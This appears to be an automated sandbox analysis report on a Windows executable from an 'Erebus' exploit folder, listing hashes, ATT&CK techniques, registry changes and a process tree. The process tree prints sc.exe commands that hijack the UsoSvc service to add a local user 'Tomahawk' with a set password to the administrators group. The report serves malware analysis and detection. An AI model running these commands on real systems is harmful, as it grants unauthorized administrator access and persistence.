c977ae66e324525a57dd0982d670fce03626aa70b4c57e7aff2ba8eab97e4e75

Analysis

max time kernel
92s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-12-2024 06:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Erebus-master/exp/com/1405_1322_x64.exe
Size

132KB
MD5

2e2ddfd6d3a10d5dd51f8cbdeaeb4b75
SHA1

bf51231e74fe5ce86e612e8bec16bc555afb7d73
SHA256

85bd47cc708f80a3e9aebc5948404017053eec1c316f2c3b527011f19597ab1f
SHA512

ec9f48e571982954e98ecb76156c8c619a67c7c6dc75c3d1319ddd8fca992f4a47e86d0735882320ef4bc8ebca39c763f18e19981b7d50bb4c7db1563de90c25
SSDEEP

3072:0Ud3B51Sbph2PlpHyKE+LrmeTwMJV4NalCD:0Ix51SFA95yKEUxz

Score

8^/10

discovery evasion execution

Malware Config

Signatures

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
4980	sc.exe
4516	sc.exe
1668	sc.exe
4968	sc.exe
3536	sc.exe
3424	sc.exe
1104	sc.exe
4276	sc.exe
3128	sc.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Modifies data under HKEY_USERS 9 IoCs

Processes:

upnpcont.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	upnpcont.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	upnpcont.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 3cde0e7ad218db01	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	upnpcont.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6ea9a09c5045db01	upnpcont.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	upnpcont.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	upnpcont.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings	upnpcont.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

upnpcont.exe

description	pid	Process	procid_target
PID 3964 wrote to memory of 1104	3964	upnpcont.exe	84
PID 3964 wrote to memory of 1104	3964	upnpcont.exe	84
PID 3964 wrote to memory of 1668	3964	upnpcont.exe	86
PID 3964 wrote to memory of 1668	3964	upnpcont.exe	86
PID 3964 wrote to memory of 4968	3964	upnpcont.exe	88
PID 3964 wrote to memory of 4968	3964	upnpcont.exe	88
PID 3964 wrote to memory of 3536	3964	upnpcont.exe	90
PID 3964 wrote to memory of 3536	3964	upnpcont.exe	90
PID 3964 wrote to memory of 4276	3964	upnpcont.exe	94
PID 3964 wrote to memory of 4276	3964	upnpcont.exe	94
PID 3964 wrote to memory of 3424	3964	upnpcont.exe	98
PID 3964 wrote to memory of 3424	3964	upnpcont.exe	98
PID 3964 wrote to memory of 3128	3964	upnpcont.exe	101
PID 3964 wrote to memory of 3128	3964	upnpcont.exe	101
PID 3964 wrote to memory of 4980	3964	upnpcont.exe	105
PID 3964 wrote to memory of 4980	3964	upnpcont.exe	105
PID 3964 wrote to memory of 4516	3964	upnpcont.exe	107
PID 3964 wrote to memory of 4516	3964	upnpcont.exe	107

C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe
"C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe"
1⤵
PID:1696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
PID:3300

C:\Windows\system32\upnpcont.exe
C:\Windows\system32\upnpcont.exe -Embedding
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3964
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1104
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net user /add Tomahawk RibSt3ak69 &"
  2⤵
  - Launches sc.exe
  PID:1668
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" start UsoSvc
  2⤵
  - Launches sc.exe
  PID:4968
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3536
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net localgroup administrators /add Tomahawk & "
  2⤵
  - Launches sc.exe
  PID:4276
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" start UsoSvc
  2⤵
  - Launches sc.exe
  PID:3424
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3128
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" config UsoSvc binpath= "C:\WINDOWS\system32\svchost.exe - k netsvcs - p"
  2⤵
  - Launches sc.exe
  PID:4980
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" start UsoSvc
  2⤵
  - Launches sc.exe
  PID:4516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Temp\RGIB680.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit